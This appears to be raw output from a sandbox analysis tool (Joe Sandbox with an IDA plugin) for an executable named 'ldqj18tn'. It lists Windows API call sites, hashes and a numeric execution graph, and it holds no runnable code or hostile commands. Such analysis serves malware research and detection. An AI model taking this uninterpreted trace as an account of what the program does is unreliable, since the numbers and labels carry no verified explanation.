                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                          Similarity
                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                          • String ID:
                                                          • API String ID: 2883127279-0
                                                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                          APIs
                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringlstrcmp
                                                          • String ID: !N~
                                                          • API String ID: 623250636-529124213
                                                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                          • CloseHandle.KERNEL32(?), ref: 00405C71
                                                          Strings
                                                          • Error launching installer, xrefs: 00405C48
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                          APIs
                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                          • API String ID: 3509786178-2769509956
                                                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                          Execution Graph

                                                          Execution Coverage:4.1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:2.8%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:189
IsProcessorFeaturePresent 98179->98180 98181 27c82e 98179->98181 98183 285b3a 98180->98183 98181->98175 98186 285ae9 5 API calls ___raise_securityfailure 98183->98186 98185 285c1d 98185->98175 98186->98185 98188 27a704 EncodePointer 98187->98188 98188->98188 98189 27a71e 98188->98189 98189->98111 98191 279e3b __lock 58 API calls 98190->98191 98192 2735a7 DecodePointer EncodePointer 98191->98192 98255 279fa5 LeaveCriticalSection 98192->98255 98194 266004 98195 273604 98194->98195 98196 27360e 98195->98196 98197 273628 98195->98197 98196->98197 98256 278d58 58 API calls __getptd_noexit 98196->98256 98197->98120 98199 273618 98257 278fe6 9 API calls __cftof2_l 98199->98257 98201 273623 98201->98120 98202->98122 98204 26524d __ftell_nolock 98203->98204 98205 261207 59 API calls 98204->98205 98206 265258 GetCurrentDirectoryW 98205->98206 98258 264ec8 98206->98258 98208 26527e IsDebuggerPresent 98209 26528c 98208->98209 98210 2a0b21 MessageBoxA 98208->98210 98211 2a0b39 98209->98211 98212 2652a0 98209->98212 98210->98211 98462 26314d 59 API calls Mailbox 98211->98462 98326 2631bf 98212->98326 98215 2a0b49 98223 2a0b5f SetCurrentDirectoryW 98215->98223 98217 2652be GetFullPathNameW 98219 261821 59 API calls 98217->98219 98218 26535f SetCurrentDirectoryW 98221 26536c Mailbox 98218->98221 98220 2652f9 98219->98220 98342 25bbc6 98220->98342 98221->98124 98223->98221 98225 265314 98226 26531e 98225->98226 98463 2b4f1c AllocateAndInitializeSid CheckTokenMembership FreeSid 98225->98463 98358 26514c GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98226->98358 98229 2a0b7c 98229->98226 98232 2a0b8d 98229->98232 98464 2700cf 98232->98464 98233 265328 98235 26533d 98233->98235 98366 2659d3 98233->98366 98377 25bc70 98235->98377 98236 2a0b95 98471 261a36 98236->98471 98240 265348 98242 265358 98240->98242 98458 265ac3 98240->98458 98241 2a0ba2 98242->98218 98255->98194 98256->98199 98257->98201 98259 261207 59 API calls 98258->98259 98260 264ede 98259->98260 98491 265420 
98260->98491 98262 264efc 98505 2619e1 98262->98505 98264 264f10 98509 261c9c 98264->98509 98269 261a36 59 API calls 98270 264f34 98269->98270 98516 2539be 98270->98516 98272 264f44 Mailbox 98273 261a36 59 API calls 98272->98273 98274 264f68 98273->98274 98275 2539be 68 API calls 98274->98275 98276 264f77 Mailbox 98275->98276 98277 261207 59 API calls 98276->98277 98278 264f94 98277->98278 98520 2655bc 98278->98520 98282 264fae 98283 2a0a54 98282->98283 98284 264fb8 98282->98284 98285 2655bc 59 API calls 98283->98285 98286 27312d _W_store_winword 60 API calls 98284->98286 98288 2a0a68 98285->98288 98287 264fc3 98286->98287 98287->98288 98289 264fcd 98287->98289 98290 2655bc 59 API calls 98288->98290 98291 27312d _W_store_winword 60 API calls 98289->98291 98292 2a0a84 98290->98292 98293 264fd8 98291->98293 98295 2700cf 61 API calls 98292->98295 98293->98292 98294 264fe2 98293->98294 98296 27312d _W_store_winword 60 API calls 98294->98296 98297 2a0aa7 98295->98297 98298 264fed 98296->98298 98299 2655bc 59 API calls 98297->98299 98300 264ff7 98298->98300 98301 2a0ad0 98298->98301 98302 2a0ab3 98299->98302 98303 26501b 98300->98303 98306 261c9c 59 API calls 98300->98306 98304 2655bc 59 API calls 98301->98304 98305 261c9c 59 API calls 98302->98305 98536 2547be 98303->98536 98307 2a0aee 98304->98307 98309 2a0ac1 98305->98309 98310 26500e 98306->98310 98308 261c9c 59 API calls 98307->98308 98312 2a0afc 98308->98312 98313 2655bc 59 API calls 98309->98313 98314 2655bc 59 API calls 98310->98314 98317 2655bc 59 API calls 98312->98317 98313->98301 98314->98303 98319 2a0b0b 98317->98319 98319->98319 98321 25477a 59 API calls 98323 265055 98321->98323 98322 2543d0 59 API calls 98322->98323 98323->98321 98323->98322 98324 2655bc 59 API calls 98323->98324 98325 26509b Mailbox 98323->98325 98324->98323 98325->98208 98327 2631cc __ftell_nolock 98326->98327 98328 2631e5 98327->98328 98329 2a0314 _memset 98327->98329 98607 270284 98328->98607 98331 2a0330 GetOpenFileNameW 98329->98331 
98333 2a037f 98331->98333 98336 261821 59 API calls 98333->98336 98338 2a0394 98336->98338 98338->98338 98339 263203 98635 26278a 98339->98635 98343 25bbd3 __ftell_nolock 98342->98343 99573 262cb2 98343->99573 98345 25bbd8 98346 25bc52 98345->98346 99584 25c770 89 API calls 98345->99584 98346->98215 98346->98225 98348 25bbe5 98348->98346 99585 25f5a7 91 API calls Mailbox 98348->99585 98350 25bbee 98350->98346 98351 25bbf2 GetFullPathNameW 98350->98351 98352 261821 59 API calls 98351->98352 98353 25bc1e 98352->98353 98354 261821 59 API calls 98353->98354 98355 25bc2b 98354->98355 98356 293587 _wcscat 98355->98356 98357 261821 59 API calls 98355->98357 98357->98346 98359 2651b6 LoadImageW RegisterClassExW 98358->98359 98360 2a0b10 98358->98360 99588 253411 7 API calls 98359->99588 99589 265f5b LoadImageW EnumResourceNamesW 98360->99589 98363 26523a 98365 2650db CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98363->98365 98364 2a0b19 98365->98233 98367 2659fe _memset 98366->98367 99590 265800 98367->99590 98370 265a83 98372 265a9d Shell_NotifyIconW 98370->98372 98373 265ab9 Shell_NotifyIconW 98370->98373 98374 265aab 98372->98374 98373->98374 99594 2656f8 98374->99594 98378 29359f 98377->98378 98390 25bc95 98377->98390 99787 2ba48d 89 API calls 4 library calls 98378->99787 98380 25bf3b 98380->98240 98384 25c2b6 98384->98380 98385 25c2c3 98384->98385 99785 25c483 298 API calls Mailbox 98385->99785 98386 25bf25 Mailbox 98386->98380 99784 25c460 10 API calls Mailbox 98386->99784 98451 25bca5 Mailbox 98390->98451 99788 255376 60 API calls 98390->99788 99789 2a700c 298 API calls 98390->99789 98393 2936b3 Sleep 98393->98451 98395 29405d WaitForSingleObject 98398 29407d GetExitCodeProcess CloseHandle 98395->98398 98395->98451 98396 25bf54 timeGetTime 98396->98451 98406 25c36b 98398->98406 98399 25c210 Sleep 98434 25c1fa Mailbox 98399->98434 98400 261c9c 59 API calls 98400->98451 98401 261207 59 API calls 98401->98434 98402 2943a9 Sleep 98402->98434 98403 270fe6 59 API 
calls Mailbox 98403->98451 98406->98240 98407 25c324 timeGetTime 99786 255376 60 API calls 98407->99786 98408 27083e timeGetTime 98408->98434 98411 294440 GetExitCodeProcess 98416 29446c CloseHandle 98411->98416 98417 294456 WaitForSingleObject 98411->98417 98413 2d6562 110 API calls 98413->98434 98414 256d79 109 API calls 98414->98451 98416->98434 98417->98416 98417->98451 98418 256cd8 276 API calls 98418->98451 98420 255376 60 API calls 98420->98451 98421 2938aa Sleep 98421->98451 98422 2944c8 Sleep 98422->98451 98423 261a36 59 API calls 98423->98434 98428 253ea3 68 API calls 98428->98434 98429 25c26d 98433 261a36 59 API calls 98429->98433 98433->98386 98434->98399 98434->98401 98434->98406 98434->98408 98434->98411 98434->98413 98434->98421 98434->98422 98434->98423 98434->98428 98434->98451 99814 2b2baf 60 API calls 98434->99814 99815 255376 60 API calls 98434->99815 99816 256cd8 298 API calls 98434->99816 99857 2a70e2 59 API calls 98434->99857 99858 2b57ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98434->99858 99859 2b4148 CreateToolhelp32Snapshot Process32FirstW 98434->99859 98436 2ba48d 89 API calls 98436->98451 98438 2539be 68 API calls 98438->98451 98439 261a36 59 API calls 98439->98451 98441 255190 59 API calls Mailbox 98441->98451 98442 2553b0 276 API calls 98442->98451 98443 2a6cf1 59 API calls Mailbox 98443->98451 98445 293e13 VariantClear 98445->98451 98446 2a7aad 59 API calls 98446->98451 98447 293ea9 VariantClear 98447->98451 98448 293c57 VariantClear 98448->98451 98449 2541c4 59 API calls Mailbox 98449->98451 98450 253ea3 68 API calls 98450->98451 98451->98386 98451->98393 98451->98395 98451->98396 98451->98399 98451->98400 98451->98402 98451->98403 98451->98406 98451->98407 98451->98414 98451->98418 98451->98420 98451->98429 98451->98434 98451->98436 98451->98438 98451->98439 98451->98441 98451->98442 98451->98443 98451->98445 98451->98446 98451->98447 98451->98448 98451->98449 98451->98450 98454 2642cf 
CloseHandle 98451->98454 99632 2552b0 98451->99632 99641 259a00 98451->99641 99648 259c80 98451->99648 99679 25a820 98451->99679 99696 2bbcd6 98451->99696 99726 2be4a0 98451->99726 99729 2ce60c 98451->99729 99732 2b412a 98451->99732 99735 2bc270 98451->99735 99742 25b020 98451->99742 99790 2d6655 59 API calls 98451->99790 99791 2ba058 59 API calls Mailbox 98451->99791 99792 2ae0aa 59 API calls 98451->99792 99793 254d37 98451->99793 99811 2a6c62 59 API calls 2 library calls 98451->99811 99812 2538ff 59 API calls 98451->99812 99813 253a40 59 API calls Mailbox 98451->99813 99817 2cc355 98451->99817 98454->98451 98459 265b25 98458->98459 98460 265ad5 _memset 98458->98460 98459->98242 98461 265af4 Shell_NotifyIconW 98460->98461 98461->98459 98462->98215 98463->98229 98465 281b70 __ftell_nolock 98464->98465 98466 2700dc GetModuleFileNameW 98465->98466 98467 261a36 59 API calls 98466->98467 98468 270102 98467->98468 98469 270284 60 API calls 98468->98469 98470 27010c Mailbox 98469->98470 98470->98236 98472 261a45 __wsetenvp _memmove 98471->98472 98473 270fe6 Mailbox 59 API calls 98472->98473 98474 261a83 98473->98474 98474->98241 98492 26542d __ftell_nolock 98491->98492 98493 261821 59 API calls 98492->98493 98499 265590 Mailbox 98492->98499 98495 26545f 98493->98495 98504 265495 Mailbox 98495->98504 98556 261609 98495->98556 98496 261609 59 API calls 98496->98504 98497 265563 98498 261a36 59 API calls 98497->98498 98497->98499 98500 265584 98498->98500 98499->98262 98502 264c94 59 API calls 98500->98502 98501 261a36 59 API calls 98501->98504 98502->98499 98504->98496 98504->98497 98504->98499 98504->98501 98559 264c94 98504->98559 98506 2619fb 98505->98506 98508 2619ee 98505->98508 98507 270fe6 Mailbox 59 API calls 98506->98507 98507->98508 98508->98264 98510 261ca7 98509->98510 98511 261caf 98509->98511 98565 261bcc 59 API calls 2 library calls 98510->98565 98513 25477a 98511->98513 98514 270fe6 Mailbox 59 API calls 98513->98514 98515 254787 98514->98515 98515->98269 
98518 2539c9 98516->98518 98519 2539f0 98518->98519 98566 253ea3 98518->98566 98519->98272 98521 2655c6 98520->98521 98522 2655df 98520->98522 98523 261c9c 59 API calls 98521->98523 98524 261821 59 API calls 98522->98524 98525 264fa0 98523->98525 98524->98525 98526 27312d 98525->98526 98527 2731ae 98526->98527 98528 273139 98526->98528 98594 2731c0 60 API calls 3 library calls 98527->98594 98535 27315e 98528->98535 98592 278d58 58 API calls __getptd_noexit 98528->98592 98531 2731bb 98531->98282 98532 273145 98593 278fe6 9 API calls __cftof2_l 98532->98593 98534 273150 98534->98282 98535->98282 98537 2547c6 98536->98537 98538 270fe6 Mailbox 59 API calls 98537->98538 98539 2547d4 98538->98539 98541 2547e0 98539->98541 98595 2546ec 59 API calls Mailbox 98539->98595 98542 254540 98541->98542 98596 254650 98542->98596 98544 270fe6 Mailbox 59 API calls 98546 2545eb 98544->98546 98545 25454f 98545->98544 98545->98546 98547 2543d0 98546->98547 98548 28d6c9 98547->98548 98550 2543e7 98547->98550 98548->98550 98606 2540cb 59 API calls Mailbox 98548->98606 98551 2544ef 98550->98551 98552 254530 98550->98552 98553 2544e8 98550->98553 98551->98323 98605 25523c 59 API calls 98552->98605 98555 270fe6 Mailbox 59 API calls 98553->98555 98555->98551 98557 261aa4 59 API calls 98556->98557 98558 261614 98557->98558 98558->98495 98560 264ca2 98559->98560 98564 264cc4 _memmove 98559->98564 98563 270fe6 Mailbox 59 API calls 98560->98563 98561 270fe6 Mailbox 59 API calls 98562 264cd8 98561->98562 98562->98504 98563->98564 98564->98561 98565->98511 98582 253c30 98566->98582 98568 253eb3 98569 253f2d 98568->98569 98570 253ebd 98568->98570 98591 25523c 59 API calls 98569->98591 98571 270fe6 Mailbox 59 API calls 98570->98571 98573 253ece 98571->98573 98574 253edc 98573->98574 98575 261207 59 API calls 98573->98575 98576 253eeb 98574->98576 98589 261bcc 59 API calls 2 library calls 98574->98589 98575->98574 98578 270fe6 Mailbox 59 API calls 98576->98578 98579 253ef5 98578->98579 98590 253bc8 
68 API calls 98579->98590 98581 253f1d 98581->98519 98583 253e11 98582->98583 98584 253c43 98582->98584 98583->98568 98585 261207 59 API calls 98584->98585 98588 253c54 98584->98588 98586 253e73 98585->98586 98587 272f70 __cinit 67 API calls 98586->98587 98587->98588 98588->98568 98589->98576 98590->98581 98591->98581 98592->98532 98593->98534 98594->98531 98595->98541 98597 254659 Mailbox 98596->98597 98598 28d6ec 98597->98598 98603 254663 98597->98603 98599 270fe6 Mailbox 59 API calls 98598->98599 98601 28d6f8 98599->98601 98600 25466a 98600->98545 98603->98600 98604 255190 59 API calls Mailbox 98603->98604 98604->98603 98605->98551 98606->98550 98669 281b70 98607->98669 98610 2702b0 98612 261821 59 API calls 98610->98612 98611 2702cd 98613 2619e1 59 API calls 98611->98613 98614 2702bc 98612->98614 98613->98614 98671 26133d 98614->98671 98617 2709c5 98618 281b70 __ftell_nolock 98617->98618 98619 2709d2 GetLongPathNameW 98618->98619 98620 261821 59 API calls 98619->98620 98621 2631f7 98620->98621 98622 262f3d 98621->98622 98623 261207 59 API calls 98622->98623 98624 262f4f 98623->98624 98625 270284 60 API calls 98624->98625 98626 262f5a 98625->98626 98627 262f65 98626->98627 98628 2a0177 98626->98628 98630 264c94 59 API calls 98627->98630 98632 2a0191 98628->98632 98681 26151f 98628->98681 98631 262f71 98630->98631 98675 251307 98631->98675 98634 262f84 Mailbox 98634->98339 98691 2649c2 98635->98691 98638 29f8d6 98808 2b9b16 98638->98808 98639 2649c2 136 API calls 98641 2627c3 98639->98641 98641->98638 98643 2627cb 98641->98643 98647 2627d7 98643->98647 98648 29f8f3 98643->98648 98644 29f908 98646 270fe6 Mailbox 59 API calls 98644->98646 98645 29f8eb 98866 264a2f 98645->98866 98668 29f94d Mailbox 98646->98668 98715 2629be 98647->98715 98872 2b47e8 90 API calls _wprintf 98648->98872 98652 29f901 98652->98644 98654 29fb01 98655 272f85 _free 58 API calls 98654->98655 98656 29fb09 98655->98656 98657 264a2f 84 API calls 98656->98657 98662 29fb12 98657->98662 98661 
272f85 _free 58 API calls 98661->98662 98662->98661 98664 264a2f 84 API calls 98662->98664 98874 2aff5c 89 API calls 4 library calls 98662->98874 98664->98662 98665 261a36 59 API calls 98665->98668 98668->98654 98668->98662 98668->98665 98843 2afef8 98668->98843 98846 2b793a 98668->98846 98852 26343f 98668->98852 98860 263297 98668->98860 98873 2afe19 61 API calls 2 library calls 98668->98873 98670 270291 GetFullPathNameW 98669->98670 98670->98610 98670->98611 98672 26134b 98671->98672 98673 261981 59 API calls 98672->98673 98674 26135b 98673->98674 98674->98617 98676 251319 98675->98676 98680 251338 _memmove 98675->98680 98678 270fe6 Mailbox 59 API calls 98676->98678 98677 270fe6 Mailbox 59 API calls 98679 25134f 98677->98679 98678->98680 98679->98634 98680->98677 98684 2614db 98681->98684 98685 2614e9 CompareStringW 98684->98685 98690 29f210 98684->98690 98688 26150c 98685->98688 98687 29f25f 98688->98628 98689 274eb8 60 API calls 98689->98690 98690->98687 98690->98689 98875 264b29 98691->98875 98696 2a08bb 98699 264a2f 84 API calls 98696->98699 98697 2649ed LoadLibraryExW 98885 264ade 98697->98885 98700 2a08c2 98699->98700 98702 264ade 3 API calls 98700->98702 98704 2a08ca 98702->98704 98911 264ab2 98704->98911 98705 264a14 98705->98704 98706 264a20 98705->98706 98708 264a2f 84 API calls 98706->98708 98710 2627af 98708->98710 98710->98638 98710->98639 98712 2a08f1 98919 264a6e 98712->98919 98716 2629e7 98715->98716 98717 29fd14 98715->98717 99279 263df7 60 API calls Mailbox 98716->99279 99365 2aff5c 89 API calls 4 library calls 98717->99365 98720 29fd27 99366 2aff5c 89 API calls 4 library calls 98720->99366 98721 262a09 99280 263e47 98721->99280 98725 262a26 98727 261207 59 API calls 98725->98727 98726 29fd43 98730 262a93 98726->98730 98728 262a32 98727->98728 99291 270b8b 60 API calls __ftell_nolock 98728->99291 98732 262aa1 98730->98732 98733 29fd56 98730->98733 98731 262a3e 98734 261207 59 API calls 98731->98734 98736 261207 59 API calls 98732->98736 98735 
2642cf CloseHandle 98733->98735 98737 262a4a 98734->98737 98738 29fd62 98735->98738 98739 262aaa 98736->98739 98740 270284 60 API calls 98737->98740 98741 2649c2 136 API calls 98738->98741 98742 261207 59 API calls 98739->98742 98743 262a58 98740->98743 98744 29fd7e 98741->98744 98745 262ab3 98742->98745 99292 263ea1 98743->99292 98748 29fda3 98744->98748 98752 2b9b16 122 API calls 98744->98752 99303 270119 98745->99303 99367 2aff5c 89 API calls 4 library calls 98748->99367 98749 262aca 98753 2617e0 59 API calls 98749->98753 98756 29fd96 98752->98756 98759 262adb SetCurrentDirectoryW 98753->98759 98754 29fdba 98786 262c3e Mailbox 98754->98786 98757 29fdbf 98756->98757 98758 29fd9e 98756->98758 98761 264a2f 84 API calls 98757->98761 98760 264a2f 84 API calls 98758->98760 98764 262aee Mailbox 98759->98764 98760->98748 98762 29fdc4 98761->98762 98763 270fe6 Mailbox 59 API calls 98762->98763 98770 29fdf8 98763->98770 98766 270fe6 Mailbox 59 API calls 98764->98766 98768 262b01 98766->98768 98767 2627ef 98767->98217 98767->98242 98769 26433f 59 API calls 98768->98769 98790 262b0c Mailbox __wsetenvp 98769->98790 98771 26343f 59 API calls 98770->98771 98783 29fe41 Mailbox 98771->98783 98772 262c19 99361 2642cf 98772->99361 98773 2a0032 99370 2b789a 98773->99370 98776 262c25 SetCurrentDirectoryW 98776->98786 98779 2a0054 99374 2bfc0d 59 API calls 2 library calls 98779->99374 98782 2a0061 98784 272f85 _free 58 API calls 98782->98784 98783->98773 98788 26343f 59 API calls 98783->98788 98798 2afef8 59 API calls 98783->98798 98799 261a36 59 API calls 98783->98799 98800 2b793a 59 API calls 98783->98800 98803 2a0084 98783->98803 99368 2afe19 61 API calls 2 library calls 98783->99368 99369 26314d 59 API calls Mailbox 98783->99369 98784->98786 99274 263e25 98786->99274 98788->98783 98789 2a00e4 98789->98772 98790->98772 98792 2a00c3 98790->98792 98795 261a36 59 API calls 98790->98795 98796 2a00cb 98790->98796 99354 263ebe 67 API calls _wcscpy 98790->99354 99355 262e8f 
GetStringTypeW 98790->99355 99356 262dfe 60 API calls __wcsnicmp 98790->99356 99357 262edc GetStringTypeW __wsetenvp 98790->99357 99358 27386d GetStringTypeW _iswctype 98790->99358 99359 2627fc 165 API calls 3 library calls 98790->99359 99360 26314d 59 API calls Mailbox 98790->99360 99376 2afdb2 59 API calls 4 library calls 98792->99376 98795->98790 99377 2aff5c 89 API calls 4 library calls 98796->99377 98798->98783 98799->98783 98800->98783 99375 2aff5c 89 API calls 4 library calls 98803->99375 98805 2a009d 98806 272f85 _free 58 API calls 98805->98806 98807 2a00b0 98806->98807 98807->98786 98809 264a8c 85 API calls 98808->98809 98810 2b9b85 98809->98810 99427 2b9cf1 98810->99427 98813 29f8e7 98813->98644 98813->98645 98814 264ab2 74 API calls 98815 2b9bb4 98814->98815 98816 264ab2 74 API calls 98815->98816 98817 2b9bc4 98816->98817 98818 264ab2 74 API calls 98817->98818 98819 2b9bdf 98818->98819 98820 264ab2 74 API calls 98819->98820 98821 2b9bfa 98820->98821 98822 264a8c 85 API calls 98821->98822 98823 2b9c11 98822->98823 98824 27593c std::exception::_Copy_str 58 API calls 98823->98824 98825 2b9c18 98824->98825 98826 27593c std::exception::_Copy_str 58 API calls 98825->98826 98827 2b9c22 98826->98827 98828 264ab2 74 API calls 98827->98828 98829 2b9c36 98828->98829 98830 2b96c4 GetSystemTimeAsFileTime 98829->98830 98831 2b9c49 98830->98831 98832 2b9c5e 98831->98832 98833 2b9c73 98831->98833 98834 272f85 _free 58 API calls 98832->98834 98835 2b9c79 98833->98835 98836 2b9cd8 98833->98836 98837 2b9c64 98834->98837 99433 2b90c1 98835->99433 98839 272f85 _free 58 API calls 98836->98839 98840 272f85 _free 58 API calls 98837->98840 98839->98813 98840->98813 98842 272f85 _free 58 API calls 98842->98813 98844 270fe6 Mailbox 59 API calls 98843->98844 98845 2aff28 _memmove 98844->98845 98845->98668 98847 2b7945 98846->98847 98848 270fe6 Mailbox 59 API calls 98847->98848 98849 2b795c 98848->98849 98850 2b796b 98849->98850 98851 261a36 59 API calls 98849->98851 98850->98668 
